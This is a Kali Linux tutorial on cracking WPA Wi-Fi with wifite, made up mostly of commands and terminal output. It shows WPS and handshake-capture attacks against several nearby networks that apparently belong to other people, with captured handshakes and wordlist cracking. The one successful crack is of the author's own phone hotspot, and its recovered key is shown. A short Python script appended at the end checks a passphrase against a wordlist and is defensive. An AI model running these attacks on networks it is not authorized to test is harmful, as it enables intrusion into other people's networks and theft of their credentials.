To crack a wireless network with wifite, run it as root on Kali Linux.
This will automatically set up monitor mode and then begin the process of scanning for networks.
```
┌──(kali㉿kali)-[~]
└─$ sudo wifite
   .               .
 .´  ·  .     .  ·  `.  wifite2 2.7.0
 :  :  :  (¯)  :  :  :  a wireless auditor by derv82
 `.  ·  ` /¯\ ´  ·  .´  maintained by kimocoder
   `     /¯¯¯\     ´    https://github.com/kimocoder/wifite2

 [!] Warning: Recommended app hcxdumptool was not found. install @ apt install hcxdumptool
 [!] Warning: Recommended app hcxpcapngtool was not found. install @ apt install hcxtools
 [!] Conflicting processes: NetworkManager (PID 1682), wpa_supplicant (PID 1740)
 [!] If you have problems: kill -9 PID or re-run wifite with --kill

    Interface   PHY   Driver       Chipset
-----------------------------------------------------------------------
 1. wlan0       phy0  rtw_8822bu   Realtek Semiconductor Corp. 802.11ac NIC

 [+] Enabling monitor mode on wlan0... enabled!

NUM  ESSID                       CH  ENCR    PWR  WPS   CLIENT
---  -------------------------  ---  -----  ----  ---   ------
  1  Blade A31                    1  WPA-P  44db  no    1
  2  OPTUS_D3CB28N               11  WPA-P  26db  yes
  3  OPTUS_D02825                11  WPA-P  24db  yes
  4  Telstra20E859                2  WPA-P  21db  yes
  5  TelstraD22F23               11  WPA-P  21db  lock
  6  TelstraDB031C               11  WPA-P  21db  yes
  7  Telstra20E859*               1  WPA-P  18db  yes
  8  Telstra6C5A3A               11  WPA-P  18db  yes
  9  WiFi-955DD6                  3  WPA-P  16db  no
 10  USO                          6  WPA-P  15db  no
 11  Telstra1B31                 11  WPA-P  14db  yes
 [+] Select target(s) (1-11) separated by commas, dashes or all:
```
Then, press Control-C to select a target. Type the corresponding number for the target you wish to attack. This attack was not successful, but it showed promise as I captured a handshake, which may be useful later.
```
 [+] (1/1) Starting attacks against 34:6B:46:D0:28:28 (OPTUS_D02825)
 [+] OPTUS_D02825 (27db) WPS Pixie-Dust: [4m55s] Failed: Reaver says "WPS pin not found"
 [+] OPTUS_D02825 (30db) WPS NULL PIN: [4m55s] Failed: Reaver process stopped (exit code: 1)
 [+] OPTUS_D02825 (29db) WPS PIN Attack: [10s PINs:2] Failed: Because access point is Locked
 [!] Skipping PMKID attack, missing required tools: hcxdumptool, hcxpcapngtool
 [+] OPTUS_D02825 (28db) WPA Handshake capture: Discovered new client: CC:3F:1D:02:BA:C7
 [+] OPTUS_D02825 (28db) WPA Handshake capture: Discovered new client: E8:6F:38:5C:16:5A
 [+] OPTUS_D02825 (28db) WPA Handshake capture: Captured handshake
 [+] saving copy of handshake to hs/handshake_OPTUSD02825_34-6B-46-D0-28-28_2024-03-08T03-30-41.cap saved

 [+] analysis of captured handshake file:
 [+]   tshark: .cap file contains a valid handshake for (34:6b:46:d0:28:28)
 [+] aircrack: .cap file contains a valid handshake for (34:6B:46:D0:28:28)

 [+] Cracking WPA Handshake: Running aircrack-ng with wordlist-probable.txt wordlist
 [+] Cracking WPA Handshake: 100.00% ETA: 0s @ 20115.9kps (current key: anchoritish)
 [!] Failed to crack handshake: wordlist-probable.txt did not contain password
 [+] Finished attacking 1 target(s), exiting
```
Here is another attack on a wireless network. This one was not successful either, but this shows how I can easily capture a handshake.
```
 [+] (1/1) Starting attacks against D6:35:1D:DB:03:24 (TelstraDB031C)
 [+] TelstraDB031C (22db) WPS Pixie-Dust: [4m57s] Failed: Reaver says "WPS pin not found"
 [+] TelstraDB031C (25db) WPS NULL PIN: [4m22s] Failed: Reaver process stopped (exit code: 1)
 [+] TelstraDB031C (23db) WPS PIN Attack: [1m4s PINs:2] Failed: Because access point is Locked
 [!] Skipping PMKID attack, missing required tools: hcxdumptool, hcxpcapngtool
 [+] TelstraDB031C (23db) WPA Handshake capture: Discovered new client: CA:E9:CD:03:EC:60
 [+] TelstraDB031C (22db) WPA Handshake capture: Captured handshake
 [+] saving copy of handshake to hs/handshake_TelstraDB031C_D6-35-1D-DB-03-24_2024-03-08T03-35-28.cap saved

 [+] analysis of captured handshake file:
 [+]   tshark: .cap file contains a valid handshake for (d6:35:1d:db:03:24)
 [+] aircrack: .cap file contains a valid handshake for (D6:35:1D:DB:03:24)

 [+] Cracking WPA Handshake: Running aircrack-ng with wordlist-probable.txt wordlist
 [+] Cracking WPA Handshake: 100.00% ETA: 0s @ 21097.1kps (current key: answer123)
 [!] Failed to crack handshake: wordlist-probable.txt did not contain password
 [+] Finished attacking 1 target(s), exiting
```
Run wifite with the --dict parameter to select a custom wordlist.
```
┌──(kali㉿kali)-[~]
└─$ sudo wifite --dict rockyou.txt
   .               .
 .´  ·  .     .  ·  `.  wifite2 2.7.0
 :  :  :  (¯)  :  :  :  a wireless auditor by derv82
 `.  ·  ` /¯\ ´  ·  .´  maintained by kimocoder
   `     /¯¯¯\     ´    https://github.com/kimocoder/wifite2

 [+] option: using wordlist rockyou.txt for cracking
 [!] Warning: Recommended app hcxdumptool was not found. install @ apt install hcxdumptool
 [!] Warning: Recommended app hcxpcapngtool was not found. install @ apt install hcxtools
 [!] Conflicting processes: NetworkManager (PID 1682), wpa_supplicant (PID 1740)
 [!] If you have problems: kill -9 PID or re-run wifite with --kill

 [+] Using wlan0 already in monitor mode

NUM  ESSID                       CH  ENCR    PWR  WPS   CLIENT
---  -------------------------  ---  -----  ----  ---   ------
  1  Blade A31                    1  WPA-P  31db  no    1
  2  Telstra20E859                2  WPA-P  23db  yes   1
  3  OPTUS_D3CB28N               11  WPA-P  22db  yes
  4  TelstraDB031C               11  WPA-P  22db  yes   1
  5  OPTUS_D02825*               11  WPA-P  21db  yes
  6  TelstraD22F23               11  WPA-P  21db  lock
  7  USO                          6  WPA-P  20db  no
  8  Telstra6C5A3A               11  WPA-P  20db  yes
  9  Telstra20E859                1  WPA-P  18db  yes
 10  Telstra1B31                 11  WPA-P  16db  yes
 [+] Select target(s) (1-10) separated by commas, dashes or all: 7
```
This can help, but you need to be lucky to find a valid password with such a small wordlist. If it were 2 terabytes, you would have more luck. Still, these instructions should put you on the right track to cracking Wi-Fi with Kali Linux.
```
┌──(kali㉿kali)-[~]
└─$ sudo wifite --dict rockyou.txt
   .               .
 .´  ·  .     .  ·  `.  wifite2 2.7.0
 :  :  :  (¯)  :  :  :  a wireless auditor by derv82
 `.  ·  ` /¯\ ´  ·  .´  maintained by kimocoder
   `     /¯¯¯\     ´    https://github.com/kimocoder/wifite2

 [+] option: using wordlist rockyou.txt for cracking
 [!] Warning: Recommended app hcxdumptool was not found. install @ apt install hcxdumptool
 [!] Warning: Recommended app hcxpcapngtool was not found. install @ apt install hcxtools
 [!] Conflicting processes: NetworkManager (PID 1682), wpa_supplicant (PID 1740)
 [!] If you have problems: kill -9 PID or re-run wifite with --kill

 [+] Using wlan0 already in monitor mode

NUM  ESSID                       CH  ENCR    PWR  WPS   CLIENT
---  -------------------------  ---  -----  ----  ---   ------
  1  Blade A31                    1  WPA-P  33db  no    1
  2  OPTUS_D02825                11  WPA-P  27db  yes
  3  Telstra20E859                1  WPA-P  24db  yes
  4  OPTUS_D3CB28N               11  WPA-P  24db  yes
  5  Telstra20E859                2  WPA-P  21db  yes
  6  USO                          6  WPA-P  21db  no
  7  Telstra6C5A3A               11  WPA-P  19db  yes
  8  TelstraD22F23               11  WPA-P  19db  lock
  9  TelstraDB031C               11  WPA-P  19db  yes   1
 [+] Select target(s) (1-9) separated by commas, dashes or all: 1

 [+] (1/1) Starting attacks against BA:E5:CD:AF:70:8C (Blade A31)
 [!] Skipping PMKID attack, missing required tools: hcxdumptool, hcxpcapngtool
 [+] Blade A31 (32db) WPA Handshake capture: Discovered new client: 66:0D:3C:B1:5C:1B
 [+] Blade A31 (31db) WPA Handshake capture: Captured handshake
 [+] saving copy of handshake to hs/handshake_BladeA31_BA-E5-CD-AF-70-8C_2024-03-08T03-43-34.cap saved

 [+] analysis of captured handshake file:
 [+]   tshark: .cap file contains a valid handshake for (ba:e5:cd:af:70:8c)
 [+] aircrack: .cap file contains a valid handshake for (BA:E5:CD:AF:70:8C)

 [+] Cracking WPA Handshake: Running aircrack-ng with rockyou.txt wordlist
 [!] Failed to crack handshake: rockyou.txt did not contain password
 [+] Finished attacking 1 target(s), exiting
```
Install these tools to give wifite more advanced functionality, such as the PMKID attack it skipped in the runs above.
```
┌──(kali㉿kali)-[~]
└─$ sudo apt install hcxdumptool hcxtools
```
I did create a network myself on my phone and then I connected to it. This allowed me to capture the handshake and then the password was in the wordlist. This is what a successful capture looks like.
```
┌──(kali㉿kali)-[~]
└─$ sudo wifite --dict rockyou.txt
   .               .
 .´  ·  .     .  ·  `.  wifite2 2.7.0
 :  :  :  (¯)  :  :  :  a wireless auditor by derv82
 `.  ·  ` /¯\ ´  ·  .´  maintained by kimocoder
   `     /¯¯¯\     ´    https://github.com/kimocoder/wifite2

 [+] option: using wordlist rockyou.txt for cracking
 [!] Conflicting processes: NetworkManager (PID 1682), wpa_supplicant (PID 1740)
 [!] If you have problems: kill -9 PID or re-run wifite with --kill

 [+] Using wlan0 already in monitor mode

NUM  ESSID                       CH  ENCR    PWR  WPS   CLIENT
---  -------------------------  ---  -----  ----  ---   ------
  1  354535343434576437974...     6  WPA-P  60db  no
  2  Blade A31                    1  WPA-P  30db  no    1
  3  OPTUS_D3CB28N               11  WPA-P  26db  yes
  4  Telstra20E859                1  WPA-P  25db  yes
  5  Telstra20E859*               2  WPA-P  21db  yes
  6  TelstraDB031C               11  WPA-P  20db  yes   1
  7  TelstraD22F23               11  WPA-P  19db  lock
  8  USO                          7  WPA-P  18db  no
  9  Telstra6C5A3A               11  WPA-P  17db  yes
 10  WiFi-955DD6                  3  WPA-P  16db  no
 11  OPTUS_D02825                11  WPA-P  15db  yes
 [+] Select target(s) (1-11) separated by commas, dashes or all: 1

 [+] (1/1) Starting attacks against 6E:85:E1:CF:4C:39 (354535343434576437974355444)
 [+] 354535343434576437974355444 (60db) PMKID CAPTURE: Failed to capture PMKID
 [+] 354535343434576437974355444 (57db) WPA Handshake capture: Captured handshake
 [+] saving copy of handshake to hs/handshake_354535343434576437974355444_6E-85-E1-CF-4C-39_2024-03-08T04-17-15.cap saved

 [+] analysis of captured handshake file:
 [+]   tshark: .cap file contains a valid handshake for (6e:85:e1:cf:4c:39)
 [+] aircrack: .cap file contains a valid handshake for (6E:85:E1:CF:4C:39)

 [+] Cracking WPA Handshake: Running aircrack-ng with rockyou.txt wordlist
 [+] Cracking WPA Handshake: 0.02% ETA: 8m38s @ 19856.3kps (current key: password3)

 [+] Cracked WPA Handshake PSK: password3

 [+]   Access Point Name: 354535343434576437974355444
 [+]  Access Point BSSID: 6E:85:E1:CF:4C:39
 [+]          Encryption: WPA
 [+]      Handshake File: hs/handshake_354535343434576437974355444_6E-85-E1-CF-4C-39_2024-03-08T04-17-15.cap
 [+]      PSK (password): password3
 [+] saved crack result to cracked.json (1 total)
 [+] Finished attacking 1 target(s), exiting
```
This is the cracked.json file.
```
[
    {
        "type": "WPA",
        "date": 1709871435,
        "essid": "354535343434576437974355444",
        "bssid": "6E:85:E1:CF:4C:39",
        "key": "password3",
        "handshake_file": "hs/handshake_354535343434576437974355444_6E-85-E1-CF-4C-39_2024-03-08T04-17-15.cap"
    }
]
```
This has all the information I need.
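
The only run above that succeeded did so because the passphrase was an entry in the wordlist, found 0.02% of the way through. As an added example (not part of the original post and not wifite code), this Python script audits the passphrase of a network you administer by checking its validity and where it sits in a wordlist. The function names and the small sample wordlist are constructed for illustration; point `wordlist_path` at a real wordlist such as rockyou.txt in practice.

```python
import json
import os
import tempfile

# Record copied from the cracked.json shown above.
CRACKED_JSON = """[{"type": "WPA", "date": 1709871435,
 "essid": "354535343434576437974355444", "bssid": "6E:85:E1:CF:4C:39", "key": "password3",
 "handshake_file": "hs/handshake_354535343434576437974355444_6E-85-E1-CF-4C-39_2024-03-08T04-17-15.cap"}]"""

# Constructed stand-in for a wordlist; one entry is deliberately not valid UTF-8.
SAMPLE_WORDLIST = b"123456\npassword\niloveyou\npassword3\r\nse\xf1orita\nqwertyuiop\n"

def wordlist_position(psk, wordlist_path):
    """Return (line_number, total_lines); line_number is None if psk is absent."""
    needle = psk.encode("utf-8")
    hit, total = None, 0
    with open(wordlist_path, "rb") as fh:  # read bytes: wordlists mix encodings
        for total, line in enumerate(fh, 1):
            if hit is None and line.rstrip(b"\r\n") == needle:
                hit = total
    return hit, total

def audit_psk(psk, wordlist_path):
    """List weaknesses of a passphrase for a network you administer."""
    findings = []
    # WPA/WPA2-Personal passphrases are 8 to 63 printable ASCII characters.
    if not (8 <= len(psk) <= 63 and psk.isascii() and psk.isprintable()):
        findings.append("not a valid 8-63 character WPA passphrase")
    hit, total = wordlist_position(psk, wordlist_path)
    if hit is not None:
        findings.append(f"listed in wordlist at line {hit} of {total}")
    return findings

def audit_cracked(cracked_json, wordlist_path):
    """Map each ESSID in a cracked.json document to the findings for its key."""
    return {rec["essid"]: audit_psk(rec["key"], wordlist_path)
            for rec in json.loads(cracked_json) if rec.get("type") == "WPA"}

def demo():
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "sample-wordlist.txt")
        with open(path, "wb") as fh:
            fh.write(SAMPLE_WORDLIST)
        return (audit_cracked(CRACKED_JSON, path),
                audit_psk("correct horse battery staple 42", path),
                audit_psk("short", path))

if __name__ == "__main__":
    print(demo())
```

An empty findings list only means the passphrase is absent from that particular wordlist; a long, randomly generated passphrase is what keeps it out of larger ones.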